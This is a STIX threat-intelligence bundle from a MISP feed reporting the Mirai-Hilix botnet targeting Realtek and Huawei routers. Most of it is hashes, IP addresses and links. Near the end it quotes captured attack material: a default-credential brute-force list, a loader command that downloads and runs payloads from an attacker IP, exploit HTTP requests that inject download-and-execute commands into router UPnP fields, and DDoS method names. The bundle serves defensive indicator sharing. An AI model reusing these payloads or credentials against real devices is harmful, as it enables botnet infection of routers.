adulau/misp-circl-feed
1
0
Fork 0
Code Issues 1 Pull requests Projects 1 Releases Packages Wiki Activity Actions
misp-circl-feed/feeds/circl/stix-2.1/5ebd9f11-4628-4dc2-abaf-4d54950d210f.json

694 lines
No EOL
32 KiB
JSON
Raw Blame History

{
"type": "bundle",
"id": "bundle--5ebd9f11-4628-4dc2-abaf-4d54950d210f",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T20:14:31.000Z",
"modified": "2020-05-14T20:14:31.000Z",
"name": "MalwareMustDie",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--5ebd9f11-4628-4dc2-abaf-4d54950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T20:14:31.000Z",
"modified": "2020-05-14T20:14:31.000Z",
"name": "Linux/Mirai-Hilix (w/New TABLE encoder) aims Realtek & Huawei routers",
"published": "2020-05-14T20:15:14Z",
"object_refs": [
"observed-data--5ebda0e8-d424-4544-accb-4540950d210f",
"url--5ebda0e8-d424-4544-accb-4540950d210f",
"observed-data--5ebda0e8-733c-4f46-a368-4b7e950d210f",
"url--5ebda0e8-733c-4f46-a368-4b7e950d210f",
"observed-data--5ebda0e8-c404-4fa2-a2ba-48a0950d210f",
"url--5ebda0e8-c404-4fa2-a2ba-48a0950d210f",
"observed-data--5ebda0e8-b39c-4e34-8fde-48f7950d210f",
"url--5ebda0e8-b39c-4e34-8fde-48f7950d210f",
"observed-data--5ebda19c-1004-4b99-af52-4bcb950d210f",
"file--5ebda19c-1004-4b99-af52-4bcb950d210f",
"observed-data--5ebda19d-5838-41fe-a455-481a950d210f",
"file--5ebda19d-5838-41fe-a455-481a950d210f",
"observed-data--5ebda19d-ffb8-4c9f-a0a5-4f0c950d210f",
"file--5ebda19d-ffb8-4c9f-a0a5-4f0c950d210f",
"observed-data--5ebda19d-39e8-459b-8128-458e950d210f",
"file--5ebda19d-39e8-459b-8128-458e950d210f",
"observed-data--5ebda19d-ea98-4dd8-bda1-4847950d210f",
"file--5ebda19d-ea98-4dd8-bda1-4847950d210f",
"observed-data--5ebda19d-60e0-4e0c-a372-45c1950d210f",
"file--5ebda19d-60e0-4e0c-a372-45c1950d210f",
"observed-data--5ebda19d-71f4-4308-baa0-4fe2950d210f",
"file--5ebda19d-71f4-4308-baa0-4fe2950d210f",
"observed-data--5ebda214-8710-467a-aa11-4de1950d210f",
"file--5ebda214-8710-467a-aa11-4de1950d210f",
"observed-data--5ebda214-08f8-4218-bc78-42a6950d210f",
"file--5ebda214-08f8-4218-bc78-42a6950d210f",
"observed-data--5ebda214-89a0-452e-8f30-4874950d210f",
"file--5ebda214-89a0-452e-8f30-4874950d210f",
"observed-data--5ebda214-02e4-4f15-8e44-4feb950d210f",
"file--5ebda214-02e4-4f15-8e44-4feb950d210f",
"observed-data--5ebda214-b6e4-4cf5-a789-46a7950d210f",
"file--5ebda214-b6e4-4cf5-a789-46a7950d210f",
"observed-data--5ebda2f3-d320-4e88-b43c-4c03950d210f",
"network-traffic--5ebda2f3-d320-4e88-b43c-4c03950d210f",
"ipv4-addr--5ebda2f3-d320-4e88-b43c-4c03950d210f",
"observed-data--5ebda2f3-d174-41d1-a36e-44cb950d210f",
"network-traffic--5ebda2f3-d174-41d1-a36e-44cb950d210f",
"ipv4-addr--5ebda2f3-d174-41d1-a36e-44cb950d210f",
"observed-data--5ebda2f3-d6a4-495a-a6c3-40b1950d210f",
"network-traffic--5ebda2f3-d6a4-495a-a6c3-40b1950d210f",
"ipv4-addr--5ebda2f3-d6a4-495a-a6c3-40b1950d210f",
"observed-data--5ebda2f4-5bdc-49d3-bd46-4829950d210f",
"network-traffic--5ebda2f4-5bdc-49d3-bd46-4829950d210f",
"ipv4-addr--5ebda2f4-5bdc-49d3-bd46-4829950d210f",
"x-misp-attribute--5ebda3c1-a0e4-41db-a6a5-43ee950d210f",
"x-misp-attribute--5ebda451-d9f4-47c6-b3d5-4ce5950d210f",
"x-misp-attribute--5ebda510-e6b4-49ac-b728-422c950d210f",
"x-misp-attribute--5ebda63b-a5b4-4b74-9ca1-4130950d210f"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"circl:incident-classification=\"malware\"",
"malware_classification:malware-category=\"Botnet\"",
"Mirai"
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda0e8-d424-4544-accb-4540950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:50:00.000Z",
"modified": "2020-05-14T19:50:00.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"url--5ebda0e8-d424-4544-accb-4540950d210f"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"Internal reference\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5ebda0e8-d424-4544-accb-4540950d210f",
"value": "https://www.virustotal.com/gui/file/a7f3670b9720fd2092d0cd0f52b46fecd431d442a9bff6ec8839e854147b7c53/community"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda0e8-733c-4f46-a368-4b7e950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:50:00.000Z",
"modified": "2020-05-14T19:50:00.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"url--5ebda0e8-733c-4f46-a368-4b7e950d210f"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"Internal reference\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5ebda0e8-733c-4f46-a368-4b7e950d210f",
"value": "https://old.reddit.com/r/LinuxMalware/comments/gj1x02/linuxmirai_hilix/"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda0e8-c404-4fa2-a2ba-48a0950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:50:00.000Z",
"modified": "2020-05-14T19:50:00.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"url--5ebda0e8-c404-4fa2-a2ba-48a0950d210f"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"Internal reference\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5ebda0e8-c404-4fa2-a2ba-48a0950d210f",
"value": "https://imgur.com/a/lWbs6T1"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda0e8-b39c-4e34-8fde-48f7950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:50:00.000Z",
"modified": "2020-05-14T19:50:00.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"url--5ebda0e8-b39c-4e34-8fde-48f7950d210f"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"Internal reference\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5ebda0e8-b39c-4e34-8fde-48f7950d210f",
"value": "https://twitter.com/malwaremustd1e/status/1260582039503417344"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda19c-1004-4b99-af52-4bcb950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:53:00.000Z",
"modified": "2020-05-14T19:53:00.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"file--5ebda19c-1004-4b99-af52-4bcb950d210f"
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload installation\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5ebda19c-1004-4b99-af52-4bcb950d210f",
"hashes": {
"MD5": "7a5e717aa86fd986d9aef089c6e07bcd"
}
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda19d-5838-41fe-a455-481a950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:53:01.000Z",
"modified": "2020-05-14T19:53:01.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"file--5ebda19d-5838-41fe-a455-481a950d210f"
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload installation\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5ebda19d-5838-41fe-a455-481a950d210f",
"hashes": {
"MD5": "8293c25c4c759654ea72342750a91170"
}
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda19d-ffb8-4c9f-a0a5-4f0c950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:53:01.000Z",
"modified": "2020-05-14T19:53:01.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"file--5ebda19d-ffb8-4c9f-a0a5-4f0c950d210f"
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload installation\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5ebda19d-ffb8-4c9f-a0a5-4f0c950d210f",
"hashes": {
"MD5": "94008c192bd62432fbacede828e2c497"
}
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda19d-39e8-459b-8128-458e950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:53:01.000Z",
"modified": "2020-05-14T19:53:01.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"file--5ebda19d-39e8-459b-8128-458e950d210f"
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload installation\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5ebda19d-39e8-459b-8128-458e950d210f",
"hashes": {
"MD5": "749d282b6ff9e1b9390201173af694c0"
}
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda19d-ea98-4dd8-bda1-4847950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:53:01.000Z",
"modified": "2020-05-14T19:53:01.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"file--5ebda19d-ea98-4dd8-bda1-4847950d210f"
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload installation\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5ebda19d-ea98-4dd8-bda1-4847950d210f",
"hashes": {
"MD5": "34307f52ba4a81d94058c130df146c5a"
}
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda19d-60e0-4e0c-a372-45c1950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:53:01.000Z",
"modified": "2020-05-14T19:53:01.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"file--5ebda19d-60e0-4e0c-a372-45c1950d210f"
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload installation\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5ebda19d-60e0-4e0c-a372-45c1950d210f",
"hashes": {
"MD5": "84d45afab65260068009911871f5babd"
}
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda19d-71f4-4308-baa0-4fe2950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:53:01.000Z",
"modified": "2020-05-14T19:53:01.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"file--5ebda19d-71f4-4308-baa0-4fe2950d210f"
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload installation\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5ebda19d-71f4-4308-baa0-4fe2950d210f",
"hashes": {
"MD5": "ec413215dc385d95e1c89d9bda44de4d"
}
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda214-8710-467a-aa11-4de1950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:55:00.000Z",
"modified": "2020-05-14T19:55:00.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"file--5ebda214-8710-467a-aa11-4de1950d210f"
],
"labels": [
"misp:type=\"filename\"",
"misp:category=\"Payload delivery\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5ebda214-8710-467a-aa11-4de1950d210f",
"name": "Hilix.sh"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda214-08f8-4218-bc78-42a6950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:55:00.000Z",
"modified": "2020-05-14T19:55:00.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"file--5ebda214-08f8-4218-bc78-42a6950d210f"
],
"labels": [
"misp:type=\"filename\"",
"misp:category=\"Payload delivery\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5ebda214-08f8-4218-bc78-42a6950d210f",
"name": "Hilix1.sh"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda214-89a0-452e-8f30-4874950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:55:00.000Z",
"modified": "2020-05-14T19:55:00.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"file--5ebda214-89a0-452e-8f30-4874950d210f"
],
"labels": [
"misp:type=\"filename\"",
"misp:category=\"Payload delivery\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5ebda214-89a0-452e-8f30-4874950d210f",
"name": "Hilix2.sh"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda214-02e4-4f15-8e44-4feb950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:55:00.000Z",
"modified": "2020-05-14T19:55:00.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"file--5ebda214-02e4-4f15-8e44-4feb950d210f"
],
"labels": [
"misp:type=\"filename\"",
"misp:category=\"Payload delivery\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5ebda214-02e4-4f15-8e44-4feb950d210f",
"name": "Hilix3.sh"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda214-b6e4-4cf5-a789-46a7950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:55:00.000Z",
"modified": "2020-05-14T19:55:00.000Z",
"first_observed": "2020-05-12T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"file--5ebda214-b6e4-4cf5-a789-46a7950d210f"
],
"labels": [
"misp:type=\"filename\"",
"misp:category=\"Payload delivery\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--5ebda214-b6e4-4cf5-a789-46a7950d210f",
"name": "Hilix4.sh"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda2f3-d320-4e88-b43c-4c03950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:58:43.000Z",
"modified": "2020-05-14T19:58:43.000Z",
"first_observed": "2020-05-13T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"network-traffic--5ebda2f3-d320-4e88-b43c-4c03950d210f",
"ipv4-addr--5ebda2f3-d320-4e88-b43c-4c03950d210f"
],
"labels": [
"misp:type=\"ip-src\"",
"misp:category=\"Payload delivery\""
]
},
{
"type": "network-traffic",
"spec_version": "2.1",
"id": "network-traffic--5ebda2f3-d320-4e88-b43c-4c03950d210f",
"src_ref": "ipv4-addr--5ebda2f3-d320-4e88-b43c-4c03950d210f",
"protocols": [
"tcp"
]
},
{
"type": "ipv4-addr",
"spec_version": "2.1",
"id": "ipv4-addr--5ebda2f3-d320-4e88-b43c-4c03950d210f",
"value": "142.93.217.221"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda2f3-d174-41d1-a36e-44cb950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:58:43.000Z",
"modified": "2020-05-14T19:58:43.000Z",
"first_observed": "2020-05-13T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"network-traffic--5ebda2f3-d174-41d1-a36e-44cb950d210f",
"ipv4-addr--5ebda2f3-d174-41d1-a36e-44cb950d210f"
],
"labels": [
"misp:type=\"ip-src\"",
"misp:category=\"Payload delivery\""
]
},
{
"type": "network-traffic",
"spec_version": "2.1",
"id": "network-traffic--5ebda2f3-d174-41d1-a36e-44cb950d210f",
"src_ref": "ipv4-addr--5ebda2f3-d174-41d1-a36e-44cb950d210f",
"protocols": [
"tcp"
]
},
{
"type": "ipv4-addr",
"spec_version": "2.1",
"id": "ipv4-addr--5ebda2f3-d174-41d1-a36e-44cb950d210f",
"value": "159.203.44.33"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda2f3-d6a4-495a-a6c3-40b1950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:58:43.000Z",
"modified": "2020-05-14T19:58:43.000Z",
"first_observed": "2020-05-13T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"network-traffic--5ebda2f3-d6a4-495a-a6c3-40b1950d210f",
"ipv4-addr--5ebda2f3-d6a4-495a-a6c3-40b1950d210f"
],
"labels": [
"misp:type=\"ip-src\"",
"misp:category=\"Payload delivery\""
]
},
{
"type": "network-traffic",
"spec_version": "2.1",
"id": "network-traffic--5ebda2f3-d6a4-495a-a6c3-40b1950d210f",
"src_ref": "ipv4-addr--5ebda2f3-d6a4-495a-a6c3-40b1950d210f",
"protocols": [
"tcp"
]
},
{
"type": "ipv4-addr",
"spec_version": "2.1",
"id": "ipv4-addr--5ebda2f3-d6a4-495a-a6c3-40b1950d210f",
"value": "194.180.224.124"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5ebda2f4-5bdc-49d3-bd46-4829950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T19:58:44.000Z",
"modified": "2020-05-14T19:58:44.000Z",
"first_observed": "2020-05-13T00:00:00Z",
"last_observed": "2020-05-15T00:00:00Z",
"number_observed": 1,
"object_refs": [
"network-traffic--5ebda2f4-5bdc-49d3-bd46-4829950d210f",
"ipv4-addr--5ebda2f4-5bdc-49d3-bd46-4829950d210f"
],
"labels": [
"misp:type=\"ip-src\"",
"misp:category=\"Payload delivery\""
]
},
{
"type": "network-traffic",
"spec_version": "2.1",
"id": "network-traffic--5ebda2f4-5bdc-49d3-bd46-4829950d210f",
"src_ref": "ipv4-addr--5ebda2f4-5bdc-49d3-bd46-4829950d210f",
"protocols": [
"tcp"
]
},
{
"type": "ipv4-addr",
"spec_version": "2.1",
"id": "ipv4-addr--5ebda2f4-5bdc-49d3-bd46-4829950d210f",
"value": "194.180.224.150"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5ebda3c1-a0e4-41db-a6a5-43ee950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T20:02:09.000Z",
"modified": "2020-05-14T20:02:09.000Z",
"labels": [
"misp:type=\"comment\"",
"misp:category=\"Targeting data\""
],
"x_misp_category": "Targeting data",
"x_misp_comment": "Linux/Mirai Hilix targeted products (telnet default password)",
"x_misp_type": "comment",
"x_misp_value": "\"root\",\"xc3511\"\r\n\"root\",\"xc3518\"\r\n\"root\",\"xc3515\"\r\n\"vstarcam2015\",\"20150602\"\r\n\"admin\",\"admin\"\r\n\"root\",\"zte9x15\"\r\n\"root\",\"vizxv\"\r\n\"root\",\"admin\"\r\n\"root\",\"vertex25ektks123\"\r\n\"admin\",\"vertex25ektks123\"\r\n\"root\",\"Zte521\"\r\n\"default\"\r\n\"default\",\"OxhlwSG8\"\r\n\"default\",\"S2fGqNFs\"\r\n\"default\",\"lJwpbo6\"\r\n\"default\",\"antslq\"\r\n\"guest\",\"xc3511\"\r\n\"admin\",\"aquario\"\r\n\"support\",\"support\"\r\n\"admin\",\"password\"\r\n\"user\",\"user\"\r\n\"admin\",\"admin1234\"\r\n\"admin\",\"1111\"\r\n\"guest\",\"guest\"\r\n\"guest\",\"12345\"\r\n\"admin\",\"1234\"\r\n\"admin\",\"ipcam_rt5350\"\r\n\"root\",\"ipcam_rt5350\"\r\n\"admin\",\"ho4uku6at\"\r\n\"admin\",\"kont2004\"\r\n\"admin\",\"Win1doW$ \"\r\n\"root\",\"hunt5759\"\r\n\"admin\",\"COadmin123\"\r\n\"admin\",\"ZmqVfoSIP\"\r\n\"root\",\"3ep5w2u\""
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5ebda451-d9f4-47c6-b3d5-4ce5950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T20:04:33.000Z",
"modified": "2020-05-14T20:04:33.000Z",
"labels": [
"misp:type=\"comment\"",
"misp:category=\"Payload installation\""
],
"x_misp_category": "Payload installation",
"x_misp_comment": "Linux/Mirai Hilix loader script injection (bruteforce default password)",
"x_misp_type": "comment",
"x_misp_value": "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.124/Hilix.sh; curl -O http://194.180.224.124/Hilix.sh; chmod 777 Hilix.sh; sh Hilix.sh; tftp 194.180.224.124 -c get Hilix3.sh; chmod 777 Hilix3.sh; sh Hilix3.sh; tftp -r Hilix2.sh -g 194.180.224.124; chmod 777 Hilix2.sh; sh Hilix2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.124 Hilix1.sh Hilix1.sh; sh Hilix1.sh; rm -rf Hilix.sh Hilix3.sh Hilix2.sh Hilix1.sh; rm -rf *; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.124/bins/Hilix.x86 -O /tmp/Hilix; chmod +x /tmp/Hilix; /tmp/Hilix sbot.x86"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5ebda510-e6b4-49ac-b728-422c950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T20:07:44.000Z",
"modified": "2020-05-14T20:07:44.000Z",
"labels": [
"misp:type=\"comment\"",
"misp:category=\"Payload delivery\""
],
"x_misp_category": "Payload delivery",
"x_misp_comment": "Linux/Mirai Hilix loader's infection script injection (Realtek, Huawei routers vulnerabilities)",
"x_misp_type": "comment",
"x_misp_value": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\\r\\nContent-Length: 430\\r\\nConnection: keep-alive\\r\\nAccept: */\u00ef\u00bc\u0160\\r\\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\\r\\n\\r\\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 159.203.44.33 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>\\r\\n\\r\\n\r\n\r\nPOST /picdesc.xml HTTP/1.1\\r\\nHost: 127.0.0.1:52869\\r\\nContent-Length: 630\\r\\nAccept-Encoding: gzip, deflate\\r\\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\\r\\nAccept: */*\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\r\\nConnection: keep-alive\\r\\n\\r\\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://159.203.44.33/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\\r\\n\\r\\n\r\n\r\n\r\nPOST /wanipcn.xml HTTP/1.1\\r\\nHost: 127.0.0.1:52869\\r\\nContent-Length: 630\\r\\nAccept-Encoding: gzip, deflate\\r\\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\\r\\nAccept: */*\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\r\\nConnection: keep-alive\\r\\n\\r\\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://159.203.44.33/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\\r\\n\\r\\n"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5ebda63b-a5b4-4b74-9ca1-4130950d210f",
"created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f",
"created": "2020-05-14T20:12:43.000Z",
"modified": "2020-05-14T20:12:43.000Z",
"labels": [
"misp:type=\"comment\"",
"misp:category=\"Network activity\""
],
"x_misp_category": "Network activity",
"x_misp_comment": "Linux/Mirai Hilix DDoS attack methods",
"x_misp_type": "comment",
"x_misp_value": "attack_method_greip\r\nattack_method_greeth\r\nattack_method_std\r\nattack_method_tcpsyn\r\nattack_method_tcpack\r\nattack_method_tcpstomp\r\nattack_method_tcpxmas\r\nattack_method_udpgeneric\r\nattack_method_udpvse\r\nattack_method_udpdns\r\nattack_method_udpplain"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}
Reference in a new issue View git blame Copy permalink